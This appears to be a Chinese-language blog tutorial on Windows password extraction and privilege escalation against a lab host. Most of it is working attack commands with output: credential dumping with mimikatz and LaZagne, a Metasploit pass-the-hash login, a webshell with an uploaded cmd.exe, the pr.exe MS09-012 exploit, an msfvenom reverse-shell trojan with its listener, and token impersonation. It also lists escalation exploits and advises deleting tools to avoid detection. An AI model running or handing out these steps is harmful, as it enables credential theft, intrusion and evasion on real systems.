51-52Windows密码安全性测试与Windows提权

目录

Windows密码安全性测试

一、本地管理员密码如何直接提取

1、直接通过mimikatz读取管理员密码

2、使用laZagne工具读取管理员密码

二、利用Hash远程登录系统

 window提权

三、远程webshell执行命令解决

不能执行原因:

解决方法:单独上传cmd.exe到有读写权限目录执行。

1、网站目录寻找有读写权限目录

2、上传cmd.exe到读写权限目录

四、提权

1、菜刀提权

使用MS09-012漏洞

 2、msf提权


Windows密码安全性测试

一、本地管理员密码如何直接提取

需把读取管理员密码的工具上传到目标主机后(通过低权限账户访问、利用漏洞等)执行工具里的批处理脚本生成文本文件,下载文本文件获取到管理员密码。

1、直接通过mimikatz读取管理员密码

1.1使用【mimikatz】命令行工具提权:

正常情况下通过webshell上传【mimikatz】工具包,在运行批处理脚本生成读取管理员密码的文档。

此处先用命令行进行演示:

【mimikatz】放到C盘下,cmd切换到32位目录下运行mimikatz.exe:

运行步骤: 

cmd切换到目录下:
cd C:\mimikatz\Win32

运行程序:
mimikatz.exe

提升权限privilege::debug:
mimikatz # privilege::debug
Privilege '20' OK

抓取密码sekurlsa::logonpassWords:
mimikatz # sekurlsa::logonpassWords

 获取到密码:

输出结果:
Authentication Id : 0 ; 80142 (00000000:0001390e)
Session           : Service from 0
User Name         : Administrator
Domain            : OLDBOY-F74D04FE
Logon Server      : OLDBOY-F74D04FE
Logon Time        : 2024-5-28 21:30:53
SID               : S-1-5-21-919573472-2361006267-3082311417-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * LM       : 44efce164ab921caaad3b435b51404ee
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        wdigest :
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * Password : 123456
        kerberos :
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * Password : 123456
        ssp :
        credman :

 批处理方式:

新建aaa.bat批处理文件并写入123.txt文件,批处理文件内容如下:

mimikatz.exe "privilege::debug" "sekurlsa::logonpassWords" exit>123.txt


 远程获取目标主机密码大致方法:

准备阶段

  1. 选择合适的工具:选择一个适合提取密码的工具,如Mimikatz。确保该工具适用于目标系统的操作系统版本。

  2. 编写批处理脚本:创建一个批处理脚本(passwords.bat文件),用于自动化执行密码提取和结果保存过程。例如:

mimikatz.exe privilege::debug sekurlsa::logonpasswords > passwords.txt

这段脚本首先提升Mimikatz的权限,然后执行密码提取命令,并将输出重定向到passwords.txt文件中。

上传与执行

  1. 上传工具和脚本:使用您已有的访问权限(如低权限账户、已知漏洞等),将Mimikatz可执行文件和上述批处理脚本上传到目标主机。可以使用copy命令(通过命令行)、SCP、SMB共享或其他文件传输方法。

  2. 执行批处理脚本

    通过远程桌面、PsExec、PowerShell Remoting或计划任务等方式,远程执行上传的批处理脚本。例如,如果脚本位于C:\temp\passwords.bat,可以通过PsExec执行:

psexec \\target_ip -u low_privilege_user -p password C:\temp\passwords.bat

  • psexec: 使用PsExec工具,这是一个轻量级的telnet-replacement,可以远程执行命令行程序。
  • \\target_ip: 指定目标计算机的IP地址。
  • -u low_privilege_user -p password: 分别指定了用于远程登录目标计算机的低权限用户名和密码。
  • C:\temp\extract_passwords.bat: 指定在目标计算机上要执行的批处理脚本的完整路径。

下载结果

  1. 下载密码文件:一旦批处理脚本执行完成,会在指定位置生成包含密码信息的文本文件(在这个例子中是passwords.txt)。使用与上传时相同或类似的方法,将此文件下载回你的工作站进行分析。

copy \\target_ip\C$\temp\passwords.txt C:\local_download\

  • copy: 这是Windows命令行中用于复制文件的命令。
  • \\target_ip\C$: 这部分指定了网络路径,其中\\target_ip是目标计算机的IP地址,\C$是Windows系统默认的管理员共享,允许你访问目标计算机的C盘根目录。这要求你有相应的网络访问权限和认证信息。
  • temp\passwords.txt: 表示在目标计算机C盘的temp目录下名为passwords.txt的文件,这是你要复制的源文件。
  • C:\local_download\: 这是目标路径,即你希望在本地计算机上存放复制文件的位置。请确保该目录事先存在,否则命令可能会失败。

清理与报告

  1. 清理痕迹:为了减少被目标系统管理员发现的风险,考虑在操作完成后删除上传的工具、脚本和生成的密码文件。

  2. 分析与报告:在安全的环境中分析下载的密码文件,提取所需信息,并根据测试或审计需求准备相应的报告。


2、使用laZagne工具读取管理员密码

cmd里切换到目录:
cd C:\lan\lan2

运行:
laZagne.exe

-------

positional arguments:
  {chats,svn,all,wifi,mails,windows,database,sysadmin,browsers}
                        Choose a main command
    chats               Run chats module #运行聊天模块
    svn                 Run svn module #运行SVN版本控制系统模块
    all                 Run all modules #运行所有模块
    wifi                Run wifi module #运行无线网络相关模块
    mails               Run mails module #运行邮件管理模块
    windows             Run windows module #运行针对Windows系统的模块
    database            Run database module #运行数据库操作模块
    sysadmin            Run sysadmin module #运行系统管理员相关模块
    browsers            Run browsers module #运行浏览器相关模块

使用所有模块:
laZagne.exe all
追加到1.txt:
laZagne.exe all >>1.txt

 输出结果:


|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

------------------- Windows Secrets passwords -----------------

[*] Local SAM hashes

Password found !!!
Category: System account
password: 123456
user: Administrator

Password found !!!
Category: System account
password: 123
user: 123

Hashes found !!!
hashes: 

Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:03ebb3c522071ac94b606f483fc10157:::
IUSR_OLDBOY-F74D04FE:1003:bc210210ecc96be6fd0522aa8ea96524:23561981a86db65e75fd296999b95667:::
IWAM_OLDBOY-F74D04FE:1004:cac4a79fa775cb9b8665ee4c08ed3930:8856078abf69a2bb27f287b8afde005b:::
ASPNET:1006:31ca4e307dc8dd4939d0ac34166cf041:47acc6d9ea07e60931e2a49bb6433aae:::
123:1015:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::


[+] 3 passwords have been found.
For more information launch it again with the -v option

elapsed time = 0.483999967575

 批处理方式:

 --新建aaa.bat批处理文件并写入123.txt文件,批处理文件内容如下:
laZagne.exe all exit>123.txt

有明文密码和哈希值密码,哈希值密码可通过cmd5在线平台尝试解密:cmd5

也可通过哈希值直接远程攻击。(见下)

二、利用Hash远程登录系统

结合【laZagne】工具获取到的管理员密码哈希值远程登陆系统

使用低版本kali【kali-2.0】;高版本不行

 【laZagne】工具获取到的管理员密码哈希值:

44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

  打开kali2.0,主要通过MSF提供的exploit/windows/smb/psexec 模块来完成。 

  建立远程登录并执行操作系统命令步骤:

使用msf工具:
root@kali:~# msfconsole 

选择exploit模块:
msf > use exploit/windows/smb/psexec

查看配置选项:
msf exploit(psexec) > show options 

设置目标IP地址:
msf exploit(psexec) > set RHOST 10.0.0.101

设置SMB用户名:
msf exploit(psexec) > set SMBUser administrator

设置SMB密码(哈希值):
msf exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

再次查看配置以确认:
msf exploit(psexec) > show options 

执行攻击载荷(也可使用exploit):
msf exploit(psexec) > run

获得Meterpreter会话并切换到目标系统的命令行:
meterpreter > shell

执行操作系统命令:
c:\Windows\system32>whoami

详细步骤:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                                  yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 10.0.0.101
RHOST => 10.0.0.101
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   RHOST                 10.0.0.101                                                         yes       The target address
   RPORT                 445                                                                yes       Set the SMB service port
   SERVICE_DESCRIPTION                                                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                     no        The service display name
   SERVICE_NAME                                                                             no        The service name
   SHARE                 ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
   SMBPass               44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  no        The password for the specified username
   SMBUser               administrator                                                      no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > run

[*] Started reverse handler on 10.0.0.109:4444 
[*] Connecting to the server...
[*] Authenticating to 10.0.0.101:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Created \UiDdhSlk.exe...
[+] 10.0.0.101:445 - Service started successfully...
[*] Sending stage (885806 bytes) to 10.0.0.101
[*] Deleting \UiDdhSlk.exe...
[*] Meterpreter session 1 opened (10.0.0.109:4444 -> 10.0.0.101:3082) at 2024-06-14 15:50:18 +0800


meterpreter > shell
Process 14176 created.
Channel 1 created.
Microsoft Windows [°汾 5.2.3790]
(C) °爨̹Ԑ 1985-2003 Microsoft Corp.                                                             ' ²»ˇŚ²¿»󎢲¿ļ®£¬Ҳ²»ˇ¿ʔ̐еij͐ 


c:\Windows\system32>whoami
whoami
nt authority\system

c:\Windows\system32>


 window提权

三、远程webshell执行命令解决

phpstudy运行为管理员运行,iis中间件运行为普通用户运行。

网站权限:网站一般不会设置写入权限,脚本执行权限默认为开启状态。

images图片目录一定会给写入权限 ,但要注意脚本执行权限关闭(无)


本次验证xy网站给的所有权限,且为默认IUSR用户

利用漏洞上传一句话木马到iis网站根目录,菜刀连接可以连接查看目录:

http://10.0.0.101:86/123.asp

但是远程不能执行系统命令:

说明:xy网站设置的为所有权限,根据权限的继承性,上传的文件会继承xy文件夹的权限;即便是(IUSR用户)所有权限也无法远程执行操作系统命令。

不能执行原因:

远程执行操作系统命令需调用目标主机系统的cmd.exe程序,cmd.exe无IUSE用户没有权限。

解决方法:单独上传cmd.exe到有读写权限目录执行。

1、网站目录寻找有读写权限目录

上传可检测网站读写权限的小马(通过漏洞方式,此处演示直接上传)

http://10.0.0.101:86/11.asp

2、上传cmd.exe到读写权限目录

菜刀上传到有权限目录;

 3、菜刀执行命令设置调用上传的cmd.exe进行执行:

setp C:\lan\lan2\cmd.exe

C:\wwwtest\1111\wwwwtest\XYCMS\> netstat -an | find "ESTABLISHED"
[Err] 拒绝访问。

C:\wwwtest\1111\wwwwtest\XYCMS\> whoami
[Err] 拒绝访问。

C:\wwwtest\1111\wwwwtest\XYCMS\> setp C:\lan\lan2\cmd.exe
设置终端路径为:C:\lan\lan2\cmd.exe

C:\wwwtest\1111\wwwwtest\XYCMS\> whoami
nt authority\network service(成功执行)

 (还是普通用户,可以执行命令)

四、提权

提权常用命令

whoami ——查看用户权限

systeminfo ——查看操作系统,补丁情况

ipconfig——查看当前服务器IP

ipconfig /all net user——查看当前用户情况

netstat ——查看当前网络连接情况  netstat –ano  /netstat –an | find “ESTABLISHED”

tasklist ——查看当前进程情况

tasklist /svc taskkill ——结束进程

taskkill -PID xx net start  ——启动服务

net stop ——停止服务 

常用提权exploits(漏洞利用)

MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)

CVE-2017-8464[LNKRemoteCodeExecutionVulnerability](windows10/8.1/7/2016/2010/2008)

CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows10/8.1/7/2016/2010/2008)

MS17-010 [KB4013389] [Windows Kernel Mode Drivers](windows 7/2008/2003/XP)

MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)

MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)

MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)

MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)

MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)

MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)

MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)

MS15-097 [KB3089656] [remote code execution] (win8.1/2012)

MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)

MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)

MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)

MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)

MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)

MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)

MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)

MS14-070 [KB2989935] [Kernel Driver] (2003)

MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)

MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)

MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)

MS14-002 [KB2914368] [NDProxy] (2003/XP)

MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)

MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)

MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)

MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)

MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)

MS11-080 [KB2592799] [AFD.sys] (2003/XP)

MS11-062 [KB2566454] [NDISTAPI] (2003/XP)

MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)

MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)

MS10-092 [KB2305420] [Task Scheduler] (2008/7)

MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)

MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)

MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)

MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)

MS10-012 [KB971468] [SMB Client Trans2 stack overflow] (Windows 7/2008R2)

MS09-050 [KB975517][Remote Code Execution] (2008/Vista)

MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)

MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)

MS08-068 [KB957097] [Remote Code Execution] (2000/XP)

MS08-067[KB958644][RemoteCodeExecution](Windows 2000/XP/Server 2003/Vista/Server 2008)

MS08-066 [] [] (Windows 2000/XP/Server 2003)

MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)

MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)

MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)

MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)

已对外公开提权exploits(漏洞利用):

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/WindowsExploits/Exploits

https://github.com/AusJock/Privilege-Escalation

1、菜刀提权

使用MS09-012漏洞

1.1查看是否打相关漏洞补丁

注意:使用漏洞编号要先确认目标主机是否已打此漏洞补丁;

systeminfo     查看操作系统,补丁情况

MS09-012补丁编号为KB952004;此演示目标主机为打此漏洞补丁

---------------- 

1.2打开下载的MS09-012漏洞工具(https://github.com/SecWiki/windows-kernel-exploits);把文件中的pr.exe上传用菜刀上传到权限目录;使用pr.exe程序执行命令即可提权

步骤:

1、打开MS09-012文件夹,选择pr.exe;

2、菜刀打开权限目录右击上传pr.exe到目标主机:

3、打开菜刀模拟终端,切换到上传目录,pr.exe执行命令进行提权:

cd C:\lan\lan2

pr.exe "whoami"

C:\wwwtest\1111\wwwwtest\XYCMS\> cd C:\lan\lan2

C:\lan\lan2\> pr.exe "whoami"
/xxoo/-->Build&&Change By p 
/xxoo/-->This exploit gives you a Local System shell 
/xxoo/-->Got WMI process Pid: 6744 
begin to try
/xxoo/-->Found token SYSTEM 
/xxoo/-->Command:whoami
nt authority\system(成功提权)

提权成功: 

 可添加用户


 2、msf提权

kali2022生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -o lan.exe

注解:

  • msfvenom: Metasploit框架中的组件,用于生成各种类型的payload,支持多种平台和格式。

  • -p: 指定要使用的payload类型;windows/meterpreter/reverse_tcp,意味着生成的payload会在目标Windows系统上运行,建立一个反向TCP连接到攻击者的机器。

  • LHOST=192.168.0.107: 设置监听payload连接的本地主机IP地址

  • LPORT=4444: 设置监听的端口号

  • -f exe: 指定输出格式为可执行文件(.exe),这意味着生成的payload将是一个可以直接在Windows系统上运行的可执行文件。

  • -o lan.exe: 指定输出文件名为lan.exe,即生成的恶意payload将被保存为这个名字的文件。

 下载生成的木马:

xshell输入命令:sz lan.exe

 上传到目标主机权限目录下:


kali本地监听:

┌──(root㉿oldboy)-[~]
└─# msfconsole 

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 10.0.0.200
lhost => 10.0.0.200

msf6 exploit(multi/handler) > show options 

msf6 exploit(multi/handler) > exploit 

meterpreter >

 msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 10.0.0.200 (监听payload连接的本地主机IP地址;kali)

show options

exploit

菜刀模拟终端利用上传的cmd.exe执行木马文件:

 C:\wwwtest\1111\wwwwtest\XYCMS\> setp C:\lan\lan2\cmd.exe (调用上传的cmd.exe执行命令)
设置终端路径为:C:\lan\lan2\cmd.exe

C:\wwwtest\1111\wwwwtest\XYCMS\> cd C:\lan\lan2\  (切换到木马文件目录下)

C:\lan\lan2\> whoami
nt authority\network service  (普通用户)


C:\lan\lan2\> lan.exe  (执行木马)
Run command [lan.exe] failed!

 成功本地监听:

查看当前权限:

 

 会话后台运行,返回MSF控制台:background

 使用漏洞提权:

如:烂土豆提权(ms16-075)

msf6 > search MS16-075

msf6 > use 0

msf6 exploit(windows/local/ms16_075_reflection) > show options

msf6 exploit(windows/local/ms16_075_reflection) > sessions -i

msf6 exploit(windows/local/ms16_075_reflection) > set session 2

msf6 exploit(windows/local/ms16_075_reflection) > exploit

meterpreter > getuid

 产生第三个会话;未能提升权限;通过窃取令牌,模仿令牌解决烂土豆未提升权限

 再list_tokens -u(访问的所有用户令牌信息)看一下, 可以看到当前是有了一个SYSTEM权限的模仿令牌

meterpreter > use incognito

meterpreter > list_tokens -u

执行偷取窃取令牌命令:

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"

getuid看下自己的当前用户ID,可以看到是SYSTEM 。使用shell命令获得一个交互式cmd shell:

 (shell未能进入目标主机命令行,ps查看进程使用migrate进程迁移重新进入命令行)

meterpreter > getuid

meterpreter > shell
--------------------------------

meterpreter > shell

meterpreter > ps

meterpreter > migrate 6876

meterpreter > shell

提权完成 


声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。
  • 24
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值